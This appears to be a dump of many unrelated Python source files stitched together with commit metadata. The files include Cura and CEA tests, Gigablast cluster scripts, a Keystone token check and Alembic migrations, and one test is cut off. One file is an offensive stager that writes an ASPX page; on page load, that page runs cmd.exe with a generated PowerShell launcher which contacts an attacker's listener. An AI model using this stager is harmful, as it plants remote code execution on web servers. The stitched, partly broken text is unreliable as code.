    ("ExtruderLegacy.stack.cfg", ExtruderStack),
    ("MachineLegacy.stack.cfg", GlobalStack),
    ("Left.extruder.cfg", ExtruderStack),
    ("Global.global.cfg", GlobalStack),
    ("Global.stack.cfg", GlobalStack)
])
def test_loadTypes(filename, output_class, container_registry):
    #Mock some dependencies.
    UM.Settings.ContainerStack.setContainerRegistry(container_registry)
    Resources.getAllResourcesOfType = unittest.mock.MagicMock(return_value = [os.path.join(os.path.dirname(os.path.abspath(__file__)), "stacks", filename)]) #Return just this tested file.
    # Stub lookups so the loader finds empty containers for the ids the
    # test stacks reference, and nothing else.
    def findContainers(id, container_type = 0):
        if id == "some_instance" or id == "some_definition":
            return [UM.Settings.ContainerRegistry._EmptyInstanceContainer(id)]
        else:
            return []
    container_registry.findContainers = findContainers
    with unittest.mock.patch("cura.Settings.GlobalStack.GlobalStack.findContainer"):
        with unittest.mock.patch("os.remove"):
            container_registry.load()
    #Check whether the resulting type was correct.
    stack_id = filename.split(".")[0]
    for container in container_registry._containers: #Stupid ContainerRegistry class doesn't expose any way of getting at this except by prodding the privates.
        if container.getId() == stack_id: #This is the one we're testing.
            assert type(container) == output_class
            break
    else:
        assert False #Container stack with specified ID was not loaded.
## Tests whether loading a legacy file moves the upgraded file properly.
def test_loadLegacyFileRenamed(container_registry):
    #Create a temporary file for the registry to load.
    temp_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "stacks", "temporary.stack.cfg")
    temp_file_source = os.path.join(os.path.dirname(os.path.abspath(__file__)), "stacks", "MachineLegacy.stack.cfg")
    shutil.copyfile(temp_file_source, temp_file)
    #Mock some dependencies.
    UM.Settings.ContainerStack.setContainerRegistry(container_registry)
    Resources.getAllResourcesOfType = unittest.mock.MagicMock(return_value = [temp_file]) #Return a temporary file that we'll make for this test.
    # Every id lookup resolves to an empty container for this test.
    def findContainers(id, container_type = 0):
        return [UM.Settings.ContainerRegistry._EmptyInstanceContainer(id)]
    container_registry.findContainers = findContainers
    with unittest.mock.patch("cura.Settings.GlobalStack.GlobalStack.findContainer"):
        container_registry.load()
    # The legacy .stack.cfg must be gone after loading...
    assert not os.path.isfile(temp_file)
    # ...and replaced by an upgraded file with the .global.cfg extension.
    new_filename = os.path.splitext(os.path.splitext(temp_file)[0])[0] + ".global.cfg"
assert os.path.isfile(new_filename) | # Copyright (c) 2017 Ultimaker B.V.
# Cura is released under the terms of the AGPLv3 or higher.
import os #To find the directory with test files and find the test files.
import pytest #This module contains unit tests.
import unittest.mock #To mock and monkeypatch stuff.
from cura.Settings.CuraContainerRegistry import CuraContainerRegistry #The class we're testing.
from cura.Settings.ExtruderStack import ExtruderStack #Testing for returning the correct types of stacks.
from cura.Settings.GlobalStack import GlobalStack #Testing for returning the correct types of stacks.
from UM.Resources import Resources #Mocking some functions of this.
import UM.Settings.ContainerRegistry #Making empty container stacks.
import UM.Settings.ContainerStack #Setting the container registry here properly.
from UM.Settings.DefinitionContainer import DefinitionContainer #Checking against the DefinitionContainer class.
## Gives a fresh CuraContainerRegistry instance.
@pytest.fixture()
def container_registry():
return CuraContainerRegistry()
## Tests whether loading gives objects of the correct type.
@pytest.mark.parametrize("filename, output_class", [
("ExtruderLegacy.stack.cfg", ExtruderStack),
("MachineLegacy.stack.cfg", GlobalStack),
("Left.extruder.cfg", ExtruderStack),
("Global.global.cfg", GlobalStack),
("Global.stack.cfg", GlobalStack)
])
def test_loadTypes(filename, output_class, container_registry):
#Mock some dependencies.
UM.Settings.ContainerStack.setContainerRegistry(container_registry)
Resources.getAllResourcesOfType = unittest.mock.MagicMock(return_value = [os.path.join(os.path.dirname(os.path.abspath(__file__)), "stacks", filename)]) #Return just this tested file.
def findContainers(id, container_type = 0):
if id == "some_instance" or id == "some_definition":
return [UM.Settings.ContainerRegistry._EmptyInstanceContainer(id)]
else:
return []
container_registry.findContainers = findContainers
with unittest.mock.patch("cura.Settings.GlobalStack.GlobalStack.findContainer"):
with unittest.mock.patch("os.remove"):
container_registry.load()
#Check whether the resulting type was correct.
stack_id = filename.split(".")[0]
for container in container_registry._containers: #Stupid ContainerRegistry class doesn't expose any way of getting at this except by prodding the privates.
if container.getId() == stack_id: #This is the one we're testing.
assert type(container) == output_class
break
else:
assert False #Container stack with specified ID was not loaded. | Python | 0 |
32ea42bcbc557e82e61797daf3643dc4a37d0f4c | add new stager .aspx | lib/stagers/windows/aspx.py | lib/stagers/windows/aspx.py | from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Aspx',
'Author': ['Luis Vacas @CyberVaca'],
'Description': ('Generates an aspx file'),
'Comments': [
'Simply launch launcher.aspx from iis '
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
},
'StagerRetries': {
'Description': 'Times for the stager to retry connecting.',
'Required': False,
'Value': '0'
},
'Base64' : {
'Description' : 'Switch. Base64 encode the output.',
'Required' : True,
'Value' : 'True'
},
'OutFile': {
'Description': 'File to output SCT to, otherwise displayed on the screen.',
'Required': False,
'Value': '/tmp/launcher.aspx'
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
    def generate(self):
        """Render the launcher.aspx payload for the configured listener.

        Returns the ASPX source as a string, or "" if launcher generation
        failed.
        """
        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        base64 = self.options['Base64']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        encode = False
        if base64.lower() == "true":
            encode = True
        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName, language=language, encode=encode, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            # ASPX page whose Page_Load handler spawns cmd.exe running the
            # generated launcher command.
            code = "<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n"
            code += "<%@ Import Namespace=\"System.Diagnostics\" %>\n"
            code += "<%@ Import Namespace=\"System.IO\" %>\n"
            code += "<script Language=\"c#\" runat=\"server\">\n"
            code += "void Page_Load(object sender, EventArgs e)\n"
            code += "{\n"
            code += "ProcessStartInfo psi = new ProcessStartInfo();\n"
            code += "psi.FileName = \"cmd.exe\";\n"
            code += "psi.Arguments = \"/c " + launcher + "\";\n"
            code += "psi.RedirectStandardOutput = true;\n"
            code += "psi.UseShellExecute = false;\n"
            code += "Process p = Process.Start(psi);\n"
            code += "}\n"
            code += "</script>\n"
            code += "<HTML>\n"
            code += "<HEAD>\n"
            code += "<title>Hackplayers Agent</title>\n"
            code += "</HEAD>\n"
            code += "<body >\n"
            code += "</form>\n"
            code += "</body>\n"
            code += "</HTML>\n"
            return code
| Python | 0 | |
01a659318644ef47cfe0c9ad3c484a974fb31e25 | Create __init__.py | __init__.py | __init__.py | Python | 0.000429 | ||
dead58329e0e04ae8535b097e688609b50ebfb76 | Add a script for interacting with hosts.conf files. | script/testMachines.py | script/testMachines.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import subprocess
import re
import requests
import json
import pyquery
import sys
def genHostsConf(fname, ips, numHostsPerMachine):
    """ Take an old hosts file and a list of new machine ips
        and generate a new hosts file with the new cluster
    """
    # Scan the old file for the first parseable host line; its port numbers
    # seed the port numbering of the new cluster (note the `break` -- only
    # the first matching line is used).
    fh = open(fname, 'r')
    ret = {}
    for line in fh.readlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith('#'):
            continue
        try:
            startHostId, startDnsPort, startHttpsPort, startHttpPort, startUdpPort,ip1, ip2, directory, note= re.split('\s+', line, 8)
            break
        except:
            pass
    hostCount = 0
    # One host entry per (machine, disk); the ports and the /NN/gigablast/
    # directory index all increment together within a machine.
    for ip in ips:
        dnsPort = int(startDnsPort)
        httpsPort = int(startHttpsPort)
        httpPort = int(startHttpPort)
        udpPort = int(startUdpPort)
        directory = 0
        for diskId in xrange(numHostsPerMachine):
            print "{0} {1} {2} {3} {4} {5} {6} /{7:02d}/gigablast/ note".format(hostCount, dnsPort, httpsPort, httpPort, udpPort, ip, ip, directory)
            hostCount, dnsPort, httpsPort, httpPort, udpPort, directory = \
                hostCount+ 1, dnsPort+ 1, httpsPort+ 1, httpPort+ 1, udpPort + 1, directory + 1
    print "num-mirrors: 1"
    return
def parseHostsConf(fname):
    """Parse a hosts.conf file, disk-benchmark every host, and return a dict
    keyed by host id.  Also prints the result as JSON.
    """
    fh = open(fname, 'r')
    ret = {}
    for line in fh.readlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith('#'):
            continue
        # Lines that don't split into exactly 9 fields are skipped.
        # (NOTE(review): `udbPort` looks like a typo for udpPort.)
        try:
            hostId, dnsPort, httpsPort, httpPort, udbPort,ip1, ip2, directory, note= re.split('\s+', line, 8)
        except:
            continue
        print directory, ip1, note
        #try:
        writeSpeed, readSpeed = testDiskSpeed(ip1, directory)
        #except:
        #writeSpeed, readSpeed = 0,0
        # Drop the leading '#' of the note, then take its first two words
        # as the host's group label.
        note = note[1:]
        group = re.split('\s+', note, 2)
        ret[hostId] = {"writeSpeed":writeSpeed,
                       "readSpeed":readSpeed,
                       "disk":directory,
                       "ip":ip1,
                       "hostId":hostId,
                       "note":note,
                       "group":group[0] + ' ' + group[1]
                       }
        # if note.find('novm'):
        #     ret[hostId]['vm'] = 0
        # else:
        #     ret[hostId]['vm'] = 1
        # if note.find('noht'):
        #     ret[hostId]['ht'] = 0
        # else:
        #     ret[hostId]['ht'] = 1
    print json.dumps(ret, indent=4)
    return ret
# if __name__ == "__main__":
# parseHostsConf('../hosts.conf.cluster')
def getSplitTime():
    """Scrape the admin hosts table from a hard-coded gigablast instance
    and print every table cell (exploratory/debugging helper).
    """
    hostsTable = 'http://207.241.225.222:8000/admin/hosts?c=ait&sort=13'
    qq = requests.get(hostsTable)
    d = pyquery.pyquery.PyQuery(qq.content)
    cells = d('td')
    for cell in cells.items():
        print cell.text(), '***'
def testDiskSpeed(host, directory):
writeSpeedOut = subprocess.Popen('eval `ssh-agent`;ssh-add ~/.ssh/id_ecdsa; ssh {0} "cd {1};dd if=/dev/zero of=test bs=1048576 count=2048"'.format(host,directory),
stdout=subprocess.PIPE,stderr=subprocess.PIPE, shell=True).communicate()[1]
print 'matching **', writeSpeedOut, '**'
writeSpeed = re.match('.* (\d+\.*\d+) MB/s.*', writeSpeedOut, flags=re.DOTALL)
if writeSpeed:
writeSpeed = float(writeSpeed.group(1))
else:
writeSpeed = re.match('.* (\d+\.?\d+) GB/s.*', writeSpeedOut, flags=re.DOTALL)
if writeSpeed:
writeSpeed = float(writeSpeed.group(1)) * 1000
readSpeedOut = subprocess.Popen('eval `ssh-agent`;ssh-add ~/.ssh/id_ecdsa; ssh {0} "cd {1};dd if=test of=/dev/null bs=1048576"'.format(host,directory),
stdout=subprocess.PIPE,stderr=subprocess.PIPE, shell=True).communicate()[1]
readSpeed = re.match('.* (\d+\.?\d+) MB/s.*', readSpeedOut, flags=re.DOTALL)
if readSpeed:
float(readSpeed.group(1))
else:
readSpeed = re.match('.* (\d+\.*\d+) GB/s.*', readSpeedOut, flags=re.DOTALL)
if readSpeed:
readSpeed = float(readSpeed.group(1)) * 1000
return writeSpeed, readSpeed
def graphDiskSpeed(data):
    """Turn parseHostsConf() output into CanvasJS-style bar-chart series.

    Builds one series per host group for read speeds (converted to GB/s)
    and one for write speeds, then prints both as JSON.
    """
    reads = []
    writes = []
    readByGroup = {}
    writeByGroup = {}
    # Bucket the per-host data points by group label.
    for hostId, stats in data.iteritems():
        if stats['group'] not in readByGroup:
            readByGroup[stats['group']] = []
        readByGroup[stats['group']].append({'y':stats['readSpeed'], 'label':hostId})
        if stats['group'] not in writeByGroup:
            writeByGroup[stats['group']] = []
        writeByGroup[stats['group']].append({'y':stats['writeSpeed'], 'label':hostId})
    # NOTE(review): only four colors are available -- colors.pop() raises
    # IndexError if the data contains more than four groups.
    colors = ['#5996CE', '#385E82', "#CFB959", "#826838"]
    for group, dataPoints in readByGroup.iteritems():
        # Read speeds are rescaled from MB/s to GB/s; write speeds are not.
        for xx in dataPoints:
            xx['y'] = float(xx['y']) / 1000.0
        color = colors.pop()
        reads.append({
            'type': "bar",
            'showInLegend': True,
            'name': group,
            'color': color,
            'dataPoints': dataPoints
        })
        writes.append({
            'type': "bar",
            'showInLegend': True,
            'name': group,
            'color': color,
            'dataPoints': writeByGroup[group]
        })
    print json.dumps(reads)
    print json.dumps(writes)
if __name__ == '__main__':
    # Dispatch on the first CLI argument: 'test' benchmarks the cluster,
    # 'graph' renders previously saved JSON stats, 'newhosts' prints a new
    # hosts.conf for the given machine ips.
    # BUG FIX: sys.argv always contains at least the script name, so the
    # old `len(sys.argv) > 0` guard was useless and sys.argv[1] raised
    # IndexError when no argument was given.
    if len(sys.argv) > 1:
        if sys.argv[1] == 'test':
            parseHostsConf('../hosts.conf.cluster')
        elif sys.argv[1] == 'graph':
            graphDiskSpeed(json.loads(open(sys.argv[2], 'r').read()))
        elif sys.argv[1] == 'newhosts':
            genHostsConf('../hosts.conf.cluster', sys.argv[2:], 12)
    #getSplitTime()
| Python | 0 | |
cb454d310431700e5ac9883a32f0b36e2e50e0fe | Add a check for keystone expired tokens buildup. | sensu/plugins/check-keystone-expired-tokens.py | sensu/plugins/check-keystone-expired-tokens.py | #!/opt/openstack/current/keystone/bin/python
#
# Copyright 2015, Jesse Keating <jlk@bluebox.net>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
possible_topdir = os.path.normpath(os.path.join(os.path.abspath(sys.argv[0]),
os.pardir,
os.pardir))
if os.path.exists(os.path.join(possible_topdir,
'keystone',
'__init__.py')):
sys.path.insert(0, possible_topdir)
from keystone import cli
from keystone.common import environment
from keystone import token
from keystone.common import sql
from oslo.utils import timeutils
WATERMARK=1000
# Monkeypatch the sql Token class to add a method
from keystone.token.persistence.backends.sql import TokenModel
from keystone.token.persistence.backends.sql import Token
def monkeypatch_method(cls):
    """Return a decorator that installs the decorated function on *cls*
    as a method, keyed by the function's own name.

    The function object is returned unchanged, so it also remains usable
    as a plain module-level callable.
    """
    def _attach(func):
        # Bind under the function's __name__ and hand the original back.
        setattr(cls, func.__name__, func)
        return func
    return _attach
@monkeypatch_method(Token)
def list_tokens(self):
    """Monkeypatched onto the keystone sql Token driver: count expired
    tokens and exit(1) if the buildup exceeds WATERMARK.

    Used as a Sensu-style check: a non-zero exit plus the printed message
    signals the alert.
    """
    session = sql.get_session()
    with session.begin():
        now = timeutils.utcnow()
        # All tokens whose expiry is in the past.
        query = session.query(TokenModel)
        query = query.filter(TokenModel.expires < now)
        tokens = query.all()
        if len(tokens) > WATERMARK:
            print("Too many expired keystone tokens: %s" % len(tokens))
            sys.exit(1)
# Create a class for listing the tokens and add it to the keystone-manage
# command list
class TokenList(cli.BaseApp):
    """List tokens in the DB.

    keystone-manage sub-command that triggers the monkeypatched
    Token.list_tokens() above.
    """

    # Command name as invoked on the keystone-manage command line.
    name = "token_list"

    @classmethod
    def main(cls):
        token_manager = token.persistence.PersistenceManager()
        token_manager.driver.list_tokens()

# Register the sub-command with keystone-manage's command table.
cli.CMDS.append(TokenList)
# Now do our thing
if __name__ == '__main__':
    environment.use_stdlib()

    # Prefer a development-tree keystone.conf if one exists next to us.
    dev_conf = os.path.join(possible_topdir,
                            'etc',
                            'keystone.conf')
    config_files = None
    if os.path.exists(dev_conf):
        config_files = [dev_conf]

    # keystone-manage wants a command as a argv, so give it token_list
    sys.argv.append('token_list')
    cli.main(argv=sys.argv, config_files=config_files)
| Python | 0 | |
ac40e54d22717fbf1a2444a67198cdba66506df8 | Add test for input setup workflow | cea/tests/test_inputs_setup_workflow.py | cea/tests/test_inputs_setup_workflow.py | import os
import unittest
import cea.config
from cea.utilities import create_polygon
from cea.datamanagement import zone_helper, surroundings_helper, terrain_helper, streets_helper, data_initializer, \
archetypes_mapper
# Zug site coordinates
POLYGON_COORDINATES = [(8.513465734818856, 47.178027239429234), (8.515472027162078, 47.177895971877604),
(8.515214535096632, 47.175496635565885), (8.513139577193424, 47.175600066313542),
(8.513465734818856, 47.178027239429234)]
class TestInputSetupWorkflowCase(unittest.TestCase):
    """End-to-end smoke test of the CEA input-setup workflow over a small
    polygon site (Zug): each datamanagement step is run in sequence."""

    def setUp(self):
        # Fresh default configuration, projected into a temp directory.
        self.config = cea.config.Configuration(cea.config.DEFAULT_CONFIG)
        self.config.project = os.path.expandvars("${TEMP}/reference-case-open")

    def test_input_setup_workflow(self):
        self.config.create_polygon.coordinates = POLYGON_COORDINATES
        self.config.create_polygon.filename = 'site'

        # Order matters: the site polygon must exist before the helpers run.
        data_initializer.main(self.config)
        create_polygon.main(self.config)
        # TODO: Mock osmnx.create_footprints_download
        zone_helper.main(self.config)
        surroundings_helper.main(self.config)
        terrain_helper.main(self.config)
        streets_helper.main(self.config)
        archetypes_mapper.main(self.config)
if __name__ == '__main__':
unittest.main()
| Python | 0 | |
8465d9a9b2c30b0b493bdf9ba24a29e39a51c1df | add dbutil to compute archive_begin for HADS sites | scripts/dbutil/compute_hads_sts.py | scripts/dbutil/compute_hads_sts.py | """Compute the archive start time of a HADS/DCP network"""
from pyiem.network import Table as NetworkTable
import sys
import psycopg2
import datetime
THISYEAR = datetime.datetime.now().year
HADSDB = psycopg2.connect(database='hads', host='iemdb')
MESOSITEDB = psycopg2.connect(database='mesosite', host='iemdb')
def do(network, sid):
    """Return the earliest observation time for station *sid*, or None.

    Walks the per-year raw<yr> tables backwards from the current year;
    stops at the first year with no data and returns the oldest minimum
    found so far.  `network` is currently unused -- kept for the caller's
    signature.
    """
    cursor = HADSDB.cursor()
    running = None
    # We work backwards
    for yr in range(THISYEAR, 2001, -1):
        cursor.execute("""
        SELECT min(valid) from raw""" + str(yr) + """
        WHERE station = %s
        """, (sid,))
        minv = cursor.fetchone()[0]
        if minv is None:
            # A gap year: everything older is assumed absent too.
            return running
        running = minv
    return running
def main(argv):
    """Recompute archive_begin for every station in the network named by
    argv[1] and persist changed values to the mesosite stations table."""
    network = argv[1]
    nt = NetworkTable(network)
    for sid in nt.sts.keys():
        sts = do(network, sid)
        if sts is None:
            continue
        # Only write when the stored archive_begin is missing or stale.
        if (nt.sts[sid]['archive_begin'] is None or
                nt.sts[sid]['archive_begin'] != sts):
            osts = nt.sts[sid]['archive_begin']
            f = "%Y-%m-%d %H:%M"
            print(("%s [%s] new sts: %s OLD sts: %s"
                   ) % (sid, network, sts.strftime(f),
                        osts.strftime(f) if osts is not None else 'null'))

            cursor = MESOSITEDB.cursor()
            cursor.execute("""UPDATE stations SET archive_begin = %s
            WHERE id = %s and network = %s""", (sts, sid, network))
            cursor.close()
            MESOSITEDB.commit()
if __name__ == '__main__':
main(sys.argv)
| Python | 0 | |
582b5c598da5b35032447f0eb7888051b84f844c | Add datetime to fast cache | alembic/versions/20860ffde766_add_datetime_to_fastcache.py | alembic/versions/20860ffde766_add_datetime_to_fastcache.py | """Add datetime to fastcache
Revision ID: 20860ffde766
Revises: 471e6f7722a7
Create Date: 2015-04-14 07:44:36.507406
"""
# revision identifiers, used by Alembic.
revision = '20860ffde766'
down_revision = '471e6f7722a7'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Add the indexed, nullable `datetime` column to TranslationFastCaches."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('TranslationFastCaches', sa.Column('datetime', sa.DateTime(), nullable=True))
    op.create_index(u'ix_TranslationFastCaches_datetime', 'TranslationFastCaches', ['datetime'], unique=False)
    ### end Alembic commands ###
def downgrade():
    """Revert upgrade(): drop the index, then the `datetime` column."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_index(u'ix_TranslationFastCaches_datetime', table_name='TranslationFastCaches')
    op.drop_column('TranslationFastCaches', 'datetime')
    ### end Alembic commands ###
| Python | 0.000001 | |
f54f427c16b394ff1ea0f55875bfb9d02e7264b0 | add SiD calculator. | src/get_SiD.py | src/get_SiD.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
# Introduction: This script is used to calculate similarity index (SiD)
# Created by Xiangchen Li on 2017/3/19 21:15
from collections import defaultdict
from src.global_items import genetic_code
def get_sid(virus_rscu_file, host_rscu_file):
    """Compute the similarity index D(A,B) between a virus and its host
    from two tab-separated codon/RSCU tables (header line skipped).

    R(A,B) is defined as the cosine value of the angle included between
    the virus (A) and host (B) RSCU vectors; D(A,B) = (1 - R)/2 ranges
    from 0 to 1 and represents the potential effect of the host's overall
    codon usage on that of the virus.
    """
    # Stop codons and the single-codon amino acids (ATG/Met, TGG/Trp) carry
    # no usage-bias information, so they are excluded from the comparison.
    # BUG FIX: the original `del genetic_code[...]` mutated the imported
    # module-level dict, so a second call raised KeyError; build a local
    # codon list instead.
    excluded = {"TAG", "TAA", "TGA", "ATG", "TGG"}
    codons = [c for c in genetic_code if c not in excluded]

    def _read_rscu(path):
        # Parse "codon\trscu" rows, skipping the header line.
        table = {}
        with open(path, 'r') as fh:
            for each_line in fh.readlines()[1:]:
                fields = each_line.strip().split('\t')
                table[fields[0]] = float(fields[1])
        return table

    virus_rscu_dict = _read_rscu(virus_rscu_file)
    host_rscu_dict = _read_rscu(host_rscu_file)

    aa = 0  # dot product A.B
    bb = 0  # |A|^2
    cc = 0  # |B|^2
    for codon in codons:
        aa += virus_rscu_dict[codon] * host_rscu_dict[codon]
        bb += pow(virus_rscu_dict[codon], 2)
        cc += pow(host_rscu_dict[codon], 2)
    rr = aa / pow(bb * cc, 0.5)  # rr -> R(A,B), cosine similarity
    dd = (1 - rr) / 2            # dd -> D(A,B)
    return dd
| Python | 0 | |
cd9f80c1567c945fe40e02af56433c49c6ddad65 | Create lintcode_二进制求和.py | lintcode_二进制求和.py | lintcode_二进制求和.py | /**
* http://www.lintcode.com/zh-cn/problem/add-binary/
* 给定两个二进制字符串,返回他们的和(用二进制表示。
* 样例 a = 11 b = 1 返回 100
*/
class Solution:
    # @param {string} a a number
    # @param {string} b a number
    # @return {string} the result
    def addBinary(self, a, b):
        """Add two binary strings and return the sum as a binary string."""
        # Reverse both inputs so index 0 is the least-significant digit.
        a = a[::-1]
        b = b[::-1]
        index = 0
        result = []
        flag = 0  # carry
        # Add digit pairs while both strings still have digits.
        while (index < len(a)) and (index < len(b)):
            res = int(a[index]) + int(b[index]) + flag
            result.append(str(res % 2))
            # BUG FIX: use floor division -- `res / 2` yields a float carry
            # on Python 3 (behavior is unchanged on Python 2).
            flag = res // 2
            index = index + 1
        # Consume the remainder of whichever input is longer.
        while index < len(a):
            res = int(a[index]) + flag
            result.append(str(res % 2))
            flag = res // 2
            index = index + 1
        while index < len(b):
            res = int(b[index]) + flag
            result.append(str(res % 2))
            flag = res // 2
            index = index + 1
        # A final carry becomes the most-significant digit.
        if flag != 0:
            result.append(str(flag))
        return ''.join(result[::-1])
| Python | 0.000005 | |
65b362985d502440b12efc8a6a49ab0603354fd2 | Add script to count emotional sentences according to LIWC | liwc_emotional_sentences.py | liwc_emotional_sentences.py | """Count the numbers of annotated entities and emotional sentences in the
corpus that was manually annotated.
Usage: python annotation_statistics.py <dir containing the folia files with
EmbodiedEmotions annotations>
"""
from lxml import etree
from bs4 import BeautifulSoup
from emotools.bs4_helpers import sentence, note
import argparse
import os
from collections import Counter
import json
import codecs
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('dir_name', help='the name of the dir containing the '
                        'FoLiA XML files that should be processed.')
    args = parser.parse_args()

    dir_name = args.dir_name
    # FoLiA act divisions; sentences are collected per act.
    act_tag = '{http://ilk.uvt.nl/folia}div'

    cur_dir = os.getcwd()
    os.chdir(dir_name)

    folia_counter = 0
    num_sent = 0
    num_emotional = 0
    stats = Counter()
    entity_words = {}
    text_stats = {}

    # A sentence is "emotional" when it contains a LIWC pos/neg entity.
    emotional_cats = ['liwc-Posemo', 'liwc-Negemo']

    print 'Files'
    for file_name in os.listdir(dir_name):
        folia_counter += 1
        print '{}'.format(file_name)
        text_id = file_name[0:13]
        text_stats[text_id] = Counter()
        sents = set()
        # load document
        context = etree.iterparse(file_name,
                                  events=('start', 'end'),
                                  tag=act_tag,
                                  huge_tree=True)
        for event, elem in context:
            if event == 'end' and elem.get('class') == 'act':
                # load act into memory
                act_xml = BeautifulSoup(etree.tostring(elem), 'xml')
                sentences = act_xml.find_all(sentence)
                s = None
                for sent in sentences:
                    if not note(sent.parent):
                        # some t elements appear to be empty (this is not
                        # allowed, but it happens). So, check whether there is
                        # a string to add before adding it.
                        # NOTE(review): when a sentence has no text, `s`
                        # keeps the previous sentence's text -- confirm
                        # this carry-over is intended for the dedup below.
                        if sent.t:
                            if sent.t.string:
                                s = sent.t.string
                        # calculate stats only for unique sentences in text
                        if s and s not in sents:
                            sents.add(s)
                            num_sent += 1
                            entities = sent.find_all('entity')
                            emotional = False
                            for entity in entities:
                                e = entity.attrs.get('class')
                                if e in emotional_cats:
                                    emotional = True
                            if emotional:
                                num_emotional += 1
        del context
        # clear memory
        # results in segmentation fault (for some reason)
        #if delete:
        #    elem.clear()
        #    while elem.getprevious() is not None:
        #        del elem.getparent()[0]
        #    del context
    # print stats
    print '\nBasic stats'
    print '{} sentences in {} files'.format(num_sent, folia_counter)
    perc = float(num_emotional)/float(num_sent)*100.0
    print '{} emotional sentences ({:.2f}%)'.format(num_emotional, perc)
| Python | 0 | |
c910e1898c1e49c60877e092032daebd289c6f31 | add scripts to export from env file to profile | scripts/env2profile.py | scripts/env2profile.py | #!/usr/bin/evn python
import os
import re
import sys
# Matches "NAME=VALUE" assignments, tolerating whitespace around '='.
line_re = re.compile('(\S+?)\s*?=\s*?(\S+?)$')


def env2profile(env_path, out_path):
    """Convert NAME=VALUE lines from *env_path* into shell `export`
    statements written to *out_path*.

    Non-assignment lines are skipped; the output lines are joined with
    newlines (no trailing newline).
    """
    exports = []
    with open(env_path, 'r') as env_file:
        for raw_line in env_file:
            matched = line_re.findall(raw_line)
            if matched and len(matched[0]) == 2:
                key, val = matched[0]
                exports.append('export %s=%s' % (key, val))
    with open(out_path, 'w') as out_file:
        out_file.write('\n'.join(exports))
if __name__ == '__main__':
    # Usage: env2profile.py <env-file> <output-profile>
    if len(sys.argv) == 3:
        _, env_path, out_path = sys.argv
        env2profile(env_path, out_path)
    else:
        print 'Wrong numbers of args'
| Python | 0 | |
8351d98c3036021507a75b65e424d02942f09633 | Add alembic upgrade info | alembic/versions/3d3c72ecbc0d_add_rtp_task_resource_record_table.py | alembic/versions/3d3c72ecbc0d_add_rtp_task_resource_record_table.py | """Add rtp_task_resource_record table
Revision ID: 3d3c72ecbc0d
Revises: c9a1ff35c6ed
Create Date: 2018-01-20 21:35:16.716477+00:00
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '3d3c72ecbc0d'
down_revision = 'c9a1ff35c6ed'
branch_labels = None
depends_on = None
def upgrade():
    """Create rtp_task_resource_record, keyed by (obsid, task_name), with
    obsid referencing hera_obs.obsid."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('rtp_task_resource_record',
                    sa.Column('obsid', sa.BigInteger(), nullable=False),
                    sa.Column('task_name', sa.Text(), nullable=False),
                    sa.Column('start_time', sa.BigInteger(), nullable=False),
                    sa.Column('stop_time', sa.BigInteger(), nullable=False),
                    sa.Column('max_memory', sa.Float(), nullable=True),
                    sa.Column('avg_cpu_load', sa.Float(), nullable=True),
                    sa.ForeignKeyConstraint(['obsid'], ['hera_obs.obsid'], ),
                    sa.PrimaryKeyConstraint('obsid', 'task_name')
                    )
    # ### end Alembic commands ###
def downgrade():
    """Revert upgrade(): drop the rtp_task_resource_record table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('rtp_task_resource_record')
    # ### end Alembic commands ###
| Python | 0 | |
843e6f0ccb73a387e151d7f40ef7a2b4fc1597e0 | test getmap | pathmap/test/test_getmap.py | pathmap/test/test_getmap.py | import unittest
from .. getmap import MapDownloader
class TestGetmap(unittest.TestCase):
    """Placeholder test case for MapDownloader -- no tests written yet."""
    pass


if __name__ == '__main__':
    unittest.main()
| Python | 0.000001 | |
cc89c5222ec7f6d6f95b5efdce3958b3ca33814e | Add basic functionality and regression tests for ACA dark cal module | mica/archive/tests/test_aca_dark_cal.py | mica/archive/tests/test_aca_dark_cal.py | """
Basic functionality and regression tests for ACA dark cal module.
"""
import numpy as np
from ..aca_dark import dark_cal
def test_date_to_dark_id():
    """Dark-cal ids are YYYYDOY (2011-01-15 is day-of-year 015)."""
    assert dark_cal.date_to_dark_id('2011-01-15T12:00:00') == '2011015'
def test_dark_id_to_date():
